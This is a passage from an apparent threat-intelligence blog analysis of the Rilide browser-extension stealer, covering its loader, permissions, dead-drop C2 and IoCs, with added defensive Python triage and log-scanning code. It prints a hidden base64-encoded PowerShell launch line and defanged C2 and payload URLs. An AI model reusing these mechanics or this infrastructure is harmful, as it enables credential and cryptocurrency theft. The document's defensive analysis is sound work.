c3JjXGZ1bmN0aW9uc1xXYWl0Lmpz  src\functions\Wait.js
c3JjXG1haWxzXFJlbGVhc2UuanM=  src\mails\Release.js

The last step in the PowerShell script is to add the extension to the different web browsers specified within the script itself.

Figure 20: Function calls to add the Rilide extension to the targeted web browsers.

Before installing the malicious extension, the PowerShell script terminates any running instances of the targeted web browsers. The extension is installed only for the user who is logged in when the script runs. The script then attempts to modify the Secure Preferences file (or, for Microsoft Edge, the Preferences file) within the Default or Profile subdirectories. The content shown in Figure 16 is updated to reflect the path shown in Figure 18 and is then added to the Secure Preferences JSON file. The script also checks whether the extension is already installed; if it is, the existing entry is updated with the content extracted by the script, otherwise the content is added to the file.

Figure 21: Code used to add the content shown in Figure 16 to the files used by the web browsers. This is what registers the extension with the web browser.

Once the extension path is added to the preferences file, the PowerShell script waits 4 seconds before launching the web browser.

Figure 22: The content from Figure 16 is updated to reflect the path to Rilide. The path was previously shown in Figure 18.

Rilide Browser Extension

As in Trustwave's reporting, the malware masquerades as a Google Drive utility that claims to save content to Google Drive. The extension's permissions indicate that it can interact with cookies, clipboard data, and system information. Rilide uses injected scripts to steal credentials and cryptocurrency and to take screenshots.

Figure 23: Functionality present within Rilide. Source: Hacker News

The extension masquerades as a Google Drive utility that aims to help users save content to Drive. This is indicated by the name and description specified in the manifest.json file and by the extension's icon.

Figure 24: A screenshot showing Rilide installed in Google Chrome.

Figure 25: Details about the Rilide extension within Google Chrome.

Figure 26: The malware uses the Google Drive icon as its icon.

The main files in the extension are:

- config.js
- manifest.json
- rules.json
- ico.png
- src/ToggleTest.js
- src/content/OpenRemove.js
- src/content/AlertReceive.js
- src/content/Release.js

The extension's directory contains other JavaScript files with helper functions that expand its functionality. These files are essential to the three scripts injected into each webpage.

Figure 27: Files within the Rilide directory.

manifest.json

The extension's manifest.json shows that the extension can query system information such as CPU and storage details. It can also access the browser's local storage. Moreover, the extension has permission to read from and write to the clipboard. The service worker is a file called ToggleTest.js. The extension injects three scripts into every webpage, collecting information from the pages. The scripts are:

- OpenRemove.js
- AlertReceive.js
- Release.js

Figure 28: Content of the manifest.json file.

Figure 29: The manifest.json file shows the injected scripts and declarative_net_request specifications.

💡 For more information about how browser extensions work, please read our blog.

The rules.json file is specified as part of the declarative_net_request object, an API that blocks or modifies web requests.
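The installation mechanics above (an entry written straight into Secure Preferences) and the manifest characteristics just described can both be checked from a profile's preferences file, because Chromium stores each extension's manifest inside its extensions.settings entry. The following is an added Python example, not code from the original post or from the Rilide sample: it flags extensions that were not installed from the store or are loaded from an absolute path, and for those it reports the stealer-relevant permissions, content scripts injected into every page, and any declarativeNetRequest rule that removes Content-Security-Policy. The preferences entry, manifest and rules.json below are constructed in the shape the page describes; the ids, names and paths are invented, and the function names and the rules_by_id parameter are assumptions of this example.

```python
import json
from pathlib import PureWindowsPath

# Constructed samples in the shape the page describes: a Chromium "Secure Preferences"
# extensions.settings entry (which embeds the extension's manifest) and a rules.json with a
# declarativeNetRequest rule that strips Content-Security-Policy. Ids, names and paths are
# invented; these are not the Rilide sample's files. "state": 1 is Chromium's ENABLED value.
SAMPLE_SECURE_PREFS = json.dumps({"extensions": {"settings": {
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": {
        "from_webstore": True, "state": 1,
        "path": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\1.2.3_0",
        "manifest": {"name": "Example Store Extension", "permissions": ["storage"]},
    },
    "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": {
        "from_webstore": False, "state": 1,
        "path": "C:\\Users\\victim\\AppData\\Local\\Google\\Chrome\\User Data\\QmVr\\Ab3",
        "manifest": {
            "name": "Save to Google Drive", "manifest_version": 3,
            "permissions": ["storage", "cookies", "clipboardRead", "clipboardWrite",
                            "system.cpu", "system.storage", "declarativeNetRequest"],
            "host_permissions": ["<all_urls>"],
            "background": {"service_worker": "src/ToggleTest.js"},
            "content_scripts": [{"matches": ["<all_urls>"], "run_at": "document_start",
                                 "js": ["src/content/OpenRemove.js", "src/content/AlertReceive.js",
                                        "src/content/Release.js"]}],
        },
    },
}}})
SAMPLE_RULES = json.dumps([{
    "id": 1, "priority": 1,
    "action": {"type": "modifyHeaders",
               "responseHeaders": [{"header": "content-security-policy", "operation": "remove"}]},
    "condition": {"urlFilter": "*", "resourceTypes": ["main_frame", "sub_frame"]},
}])

# Permissions that, in combination, match the stealer behaviour described on the page.
WATCH_PERMISSIONS = {"cookies", "clipboardRead", "clipboardWrite", "system.cpu",
                     "system.storage", "declarativeNetRequest"}
BROAD_MATCHES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def triage_manifest(manifest: dict) -> list:
    """Findings from a manifest: stealer-relevant permissions and scripts injected everywhere."""
    findings = [f"permission {p}" for p in manifest.get("permissions", []) if p in WATCH_PERMISSIONS]
    if BROAD_MATCHES & set(manifest.get("host_permissions", [])):
        findings.append("host_permissions cover every site")
    for cs in manifest.get("content_scripts", []):
        if BROAD_MATCHES & set(cs.get("matches", [])):
            findings.append("content scripts on every page: " + ", ".join(cs.get("js", [])))
    return findings


def triage_rules(rules: list) -> list:
    """Findings from declarativeNetRequest rules: response-header rules that remove CSP."""
    findings = []
    for rule in rules:
        action = rule.get("action", {})
        if action.get("type") != "modifyHeaders":
            continue
        for hdr in action.get("responseHeaders", []):
            if hdr.get("header", "").lower() == "content-security-policy" and hdr.get("operation") == "remove":
                findings.append(f"rule {rule.get('id')} removes Content-Security-Policy")
    return findings


def triage_profile(secure_prefs_json: str, rules_by_id: dict = None) -> list:
    """Flag extensions a loader could have registered: not from the store, or loaded from an
    absolute path (store installs use a path relative to <profile>\\Extensions). rules_by_id
    maps an extension id to the text of its rules.json when it is available on disk."""
    settings = json.loads(secure_prefs_json).get("extensions", {}).get("settings", {})
    report = []
    for ext_id, entry in settings.items():
        reasons = []
        if PureWindowsPath(entry.get("path", "")).is_absolute():
            reasons.append("absolute path")
        if not entry.get("from_webstore", False):
            reasons.append("not from web store")
        if not reasons:
            continue
        manifest = entry.get("manifest", {})
        rules = json.loads((rules_by_id or {}).get(ext_id, "[]"))
        report.append({"id": ext_id, "name": manifest.get("name", ""), "path": entry.get("path", ""),
                       "enabled": entry.get("state") == 1, "reasons": reasons,
                       "findings": triage_manifest(manifest) + triage_rules(rules)})
    return report


if __name__ == "__main__":
    for r in triage_profile(SAMPLE_SECURE_PREFS, {"bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": SAMPLE_RULES}):
        print(r["id"], repr(r["name"]), "enabled" if r["enabled"] else "disabled", r["reasons"])
        for f in r["findings"]:
            print("  -", f)
```

On a real host, feed the function the Secure Preferences file (or Preferences for Edge, as the page notes) from each Default and Profile directory under the User Data paths listed in the table above; an absolute path that points into a freshly created directory there is exactly what the loader leaves behind.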
In this case, the API is used to adjust the content security policy by removing headers.

rules.json

Figure 30: The rules declared within rules.json that are used to remove content security policies.

The rules.json file is used to modify headers in network requests and removes any content security policy values set by the web pages.

config.js

Figure 31: Configuration parameters for Rilide, including the ability to set up a Telegram C2 channel.

The config file contains references to Telegram and web-based panels. However, this sample does not appear to have a Telegram panel, as shown by the lack of details within the TelegramPanel object.

ToggleTest.js

ToggleTest.js is a heavily obfuscated file that imports functions from other JavaScript files. The file calls functions to collect system information, execute commands, and take screenshots.

Figure 32: Functions imported by the service worker, ToggleTest.js, to expand its functionality.

OpenRemove.js

This file is heavily obfuscated and uses event listeners to collect messages from cryptocurrency exchanges and other websites, such as Facebook and Google Pay. Before grabbing information, the malware checks local storage in the web browser to obtain the settings that determine what information Rilide collects.

Figure 33: Code used to create event listeners that look for cryptocurrency details.

AlertReceive.js

The AlertReceive.js file is used to read and write text from the clipboard.

Figure 34: Code used to interact with the clipboard.

Release.js

This file collects content from email applications. The injected code checks whether the web page is Outlook, Yahoo, or Gmail. Once the email application has been identified, the script examines the DOM content of the web page to collect information about the emails.
Figure 35: Deobfuscated code from Release.js that looks for Outlook, Yahoo, and Gmail pages.

Research from Trellix outlines that Rilide looks for messages from cryptocurrency exchanges and modifies their content to collect credentials from users when they attempt to log in to the exchange.

Figure 36: Notes from Trellix indicate that Rilide modified emails to lure users into signing into their cryptocurrency accounts. Source: Trellix

Network Traffic

💡 A packet capture of Rilide network traffic and SSL decryption keys are provided as a reference.

C2 Resolution using Dead Drops

Rilide queries different blockchain services to obtain the C2 server, which is stored as a base58-encoded value in another cryptocurrency address. The blockchain services queried include:

- Blockstream
- Bitcoin Explorer
- Blockcypher
- Mempool
- Bitcore

The Bitcoin address that the malware looks up is bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066.

Figure 37: Cryptocurrency transaction to the Bitcoin address the malware looks up. Source: Blockchain.com

Figure 38: Requests to blockstream.info that return another Bitcoin address that also doubles as the C2 address for the malware.

Figure 38: Requests to Blockcypher showing the second Bitcoin address.

The address is 1Aybhtfb3TM36MDmULVXJVAFni8V8tR4aS and decodes to the C2 server memento-mori[.]com.

Figure 39: The second Bitcoin address can be decoded into the C2 domain using base58.

C2 Communication

Once the C2 server has been identified, the extension starts exfiltrating information to it. The malware sends system information to the C2 server via a POST request to the URI /api/machine/init.

Figure 40: System information exfiltrated by Rilide.
The information includes:

- CPU details
- Operating system information
- Display information
- Extension details

Other endpoints observed within network traffic include:

- /api/machine/injections
- /api/machine/commands
- /api/machine/settings
- /api/machine/clipper
- /api/machine/screenshot-rules
- /api/machine/set-command

Figure 41: Phases returned by the C2 used to determine what information Rilide targets. This command also returns a reverse proxy address if the malware uses one.

Mitigations

Extension Management

Avoid installing extensions from untrusted sources or third-party websites. While using browser extension stores significantly reduces the risk of downloading malicious extensions, it does not eliminate it. Our blog, Compromised Browser Extensions - A Growing Threat Vector, highlights compromised extensions on the Chrome Web Store. Users should review the permissions requested by extensions before installing them, and should periodically review installed extensions to identify any that are no longer needed and remove them.

PowerShell Logging

Enable PowerShell logging features, including:

- Module Logging
- Script Block Logging

Ingest PowerShell logs into a SIEM or centralized log management solution for monitoring.

Block Users from Running PowerShell Commands

Restrict PowerShell usage to only those users who are required to run PowerShell commands.

Indicators of Compromise

The table below contains all Rilide network IoCs identified during the analysis of the intrusion chain.
IOCs

- hxxps[://]blockstream[.]info/api/address/bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066/txs
- hxxps[://]bitcoinexplorer[.]org/api/address/bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066?limit=1
- hxxps[://]api[.]blockcypher[.]com/v1/btc/main/addrs/bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066/full?limit=1
- hxxps[://]mempool[.]space/api/address/bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066/txs
- hxxps[://]api[.]bitcore[.]io/api/BTC/mainnet/address/bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066/txs?limit=1
- hxxps[://]mmemento-mori[.]com/api/machine/sign?d=mmemento-mori[.]com
- hxxps[://]mmemento-mori[.]com/api/machine/init
- hxxps[://]mmemento-mori[.]com/api/machine/injections?uuid=31d7f9d7-a0ea-46be-88b7-196bc3e2e5e1
- hxxps[://]mmemento-mori[.]com/api/machine/commands?uuid=31d7f9d7-a0ea-46be-88b7-196bc3e2e5e1
- hxxps[://]mmemento-mori[.]com/api/machine/settings
- hxxps[://]mmemento-mori[.]com/api/machine/clipper
- hxxps[://]mmemento-mori[.]com/api/machine/screenshot-rules
- hxxps[://]mmemento-mori[.]com/api/machine/set-command
- hxxps[://]tcl-black[.]com/1111[.]bs64
- tcl-black[.]com

The table below contains a subset of additional Rilide network IoCs that have been added to the Pulsedive platform. This data can be queried in Pulsedive using the Explore query threat=Rilide and is available for export in multiple formats (CSV, STIX 2.1, JSON).
IOCs

- ashgrrwt[.]click
- nch-software[.]info
- nvidia-graphics[.]top
- vceilinichego[.]ru
- 45[.]15[.]156[.]210
- web-lox[.]com
- assets[.]bnbcoinstatic[.]com
- proyectopatentadomxapostol[.]com
- blackfox[.]lol
- pupkalazalupka[.]com
- extension-login[.]com
- tes123123t[.]com
- extensionsupdate[.]com
- hxxps[:=//]download[.]hdoki[.]org/yzxdhdxsqkmvcayrtevs/RiotRevelry1[.]0[.]2[.]exe
- hxxps[:=//]nch-software[.]info/1/2[.]exe
- nightpredators[.]com

Rilide MITRE ATT&CK TTPs

Tactic                 Technique
Collection             Clipboard Data (T1115)
                       Email Collection (T1114)
                       Screen Capture (T1113)
Command and Control    Application Layer Protocol: Web Protocols (T1071.001)
                       Dynamic Resolution (T1568)
                       Web Service: Dead Drop Resolver (T1102.001)
                       Proxy: External Proxy (T1090.002)
                       Ingress Tool Transfer (T1105)
Credential Access      Clipboard Data (T1115)
                       Steal Web Session Cookie (T1539)
Defense Evasion        Access Token Manipulation (T1134)
                       Deobfuscate/Decode Files or Information (T1140)
                       Masquerading (T1036)
                       Obfuscated Files or Information (T1027)
                       Process Injection (T1055)
                       Virtualization/Sandbox Evasion: User Activity Based Checks (T1497.002)
Discovery              System Information Discovery (T1082)
                       Virtualization/Sandbox Evasion: User Activity Based Checks (T1497.002)
Evasion                Masquerading (T1036)
Execution              Command and Scripting Interpreter: PowerShell (T1059.001)
                       Command and Scripting Interpreter: JavaScript (T1059.007)
                       User Execution: Malicious File (T1204.002)
Initial Access         Phishing (T1566)
Persistence            Boot or Logon Autostart Execution (T1547)
                       Browser Extensions (T1176)
Privilege Escalation   Access Token Manipulation (T1134)
                       Boot or Logon Autostart Execution (T1547)
                       Process Injection: Process Hollowing (T1055.012)

References
- https://developer.chrome.com/docs/extensions/develop/migrate
- https://thehackernews.com/2023/08/new-version-of-rilide-data-theft.html
- https://x.com/vmray/status/1862414695002501223
- https://www.vmray.com/analyses/76afc4a7ef10/report/overview.html
- https://www.virustotal.com/gui/file/76afc4a7ef10d760c3fa42458e8f133f1ed4d76071ab6f4207037f64a4bffab7/detection
- https://urlscan.io/result/08eff9cb-4431-4fc9-b957-0733a5391e5e/
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rilide-a-new-malicious-browser-extension-for-stealing-cryptocurrencies/
- https://www.trellix.com/en-in/blogs/research/genesis-market-no-longer-feeds-the-evil-cookie-monster/
- https://www.exabeam.com/blog/security-operations-center/powershell-and-command-line-logging-with-logrhythm/

Appendix 1 - PowerShell Script

"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABsAFUAaABwAEoAIAA9ACAAKAAiAGsAcABDAD

Source: https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
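To tie the dead-drop resolution described under "C2 Resolution using Dead Drops" to the IoC lists above, here is an added Python example that is not part of the original post: a minimal base58 decoder that recovers a hostname packed into a Bitcoin address (the mechanism Figure 39 illustrates), and a scanner that flags, in proxy log lines, lookups of the dead-drop address on the listed blockchain services and traffic to the /api/machine/ endpoints. The addresses, host names and paths are copied from this page, with host names exactly as printed in the IoC list; the log lines are constructed, the test address is built with the example's own b58encode, the real second address is only decoded when the file is run directly, and the function names are assumptions of this example.

```python
import re
from urllib.parse import urlsplit

# Base58 alphabet used by Bitcoin addresses (no 0, O, I, l).
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Indicators copied from the page, kept defanged as printed and refanged at runtime.
DEAD_DROP_ADDRESS = "bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066"
DEAD_DROP_RESULT_ADDRESS = "1Aybhtfb3TM36MDmULVXJVAFni8V8tR4aS"
DEAD_DROP_HOSTS_DEFANGED = ["blockstream[.]info", "bitcoinexplorer[.]org",
                            "api[.]blockcypher[.]com", "mempool[.]space", "api[.]bitcore[.]io"]
C2_HOSTS_DEFANGED = ["mmemento-mori[.]com", "tcl-black[.]com"]
C2_PATHS = {"/api/machine/sign", "/api/machine/init", "/api/machine/injections",
            "/api/machine/commands", "/api/machine/settings", "/api/machine/clipper",
            "/api/machine/screenshot-rules", "/api/machine/set-command"}


def refang(indicator: str) -> str:
    """Turn the page's defanged form back into a matchable URL or host."""
    return indicator.replace("hxxp", "http").replace("[://]", "://").replace("[.]", ".")


def b58decode(text: str) -> bytes:
    """Decode base58; each leading '1' stands for a leading zero byte."""
    n = 0
    for ch in text:
        n = n * 58 + B58_ALPHABET.index(ch)   # ValueError on a non-base58 character
    leading = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading + n.to_bytes((n.bit_length() + 7) // 8, "big")


def b58encode(data: bytes) -> str:
    """Inverse of b58decode; used here only to build constructed test vectors."""
    n, digits = int.from_bytes(data, "big"), ""
    while n:
        n, rem = divmod(n, 58)
        digits = B58_ALPHABET[rem] + digits
    return "1" * (len(data) - len(data.lstrip(b"\x00"))) + digits


def hostname_from_address(address: str) -> str:
    """Recover a hostname packed into a Bitcoin address. A P2PKH address decodes to
    25 bytes (version 1 + payload 20 + checksum 4); the hostname sits in the payload."""
    raw = b58decode(address)
    payload = raw[1:-4] if len(raw) == 25 else raw
    return bytes(b for b in payload if 0x21 <= b <= 0x7E).decode("ascii")


DEAD_DROP_HOSTS = {refang(h) for h in DEAD_DROP_HOSTS_DEFANGED}
C2_HOSTS = {refang(h) for h in C2_HOSTS_DEFANGED}
LINE_RE = re.compile(r"^(\S+) (\S+) ([A-Z]+) (\S+) (\d{3})$")

# Constructed proxy log, "<timestamp> <client> <method> <url> <status>". Lines 1, 2 and 4
# mimic an infected host; line 3 is an unrelated explorer query and line 5 normal browsing.
SAMPLE_PROXY_LOG = "\n".join([
    f"2025-03-15T10:00:01Z 10.0.0.5 GET https://{refang('blockstream[.]info')}/api/address/{DEAD_DROP_ADDRESS}/txs 200",
    f"2025-03-15T10:00:03Z 10.0.0.5 POST https://{refang('mmemento-mori[.]com')}/api/machine/init 200",
    f"2025-03-15T10:01:10Z 10.0.0.9 GET https://{refang('mempool[.]space')}/api/address/bc1qunrelatedexampleaddress000000000000000/txs 200",
    f"2025-03-15T10:02:00Z 10.0.0.5 GET https://{refang('mmemento-mori[.]com')}/api/machine/commands?uuid=00000000-0000-0000-0000-000000000000 200",
    "2025-03-15T10:02:30Z 10.0.0.7 GET https://www.example.com/index.html 200",
])


def scan_proxy_log(text: str) -> list:
    """Flag dead-drop lookups of the Rilide address and traffic to the C2 hosts or paths.
    A block-explorer request for some other address is not flagged on its own."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group(4))
        host = (url.hostname or "").lower()
        reasons = []
        if host in DEAD_DROP_HOSTS and DEAD_DROP_ADDRESS in url.path:
            reasons.append("dead-drop lookup of the Rilide address")
        if host in C2_HOSTS:
            reasons.append("known Rilide host")
        if url.path in C2_PATHS:
            reasons.append(f"Rilide C2 endpoint {url.path}")
        if reasons:
            hits.append({"line": lineno, "client": m.group(2), "host": host, "reasons": reasons})
    return hits


if __name__ == "__main__":
    print(hostname_from_address(DEAD_DROP_RESULT_ADDRESS).replace(".", "[.]"))
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(hit)
```

The path check is deliberately independent of the host check: if the operators move the C2 to a new domain, the /api/machine/ endpoint names still give a detection, and a hit on both together is a much stronger signal than either alone.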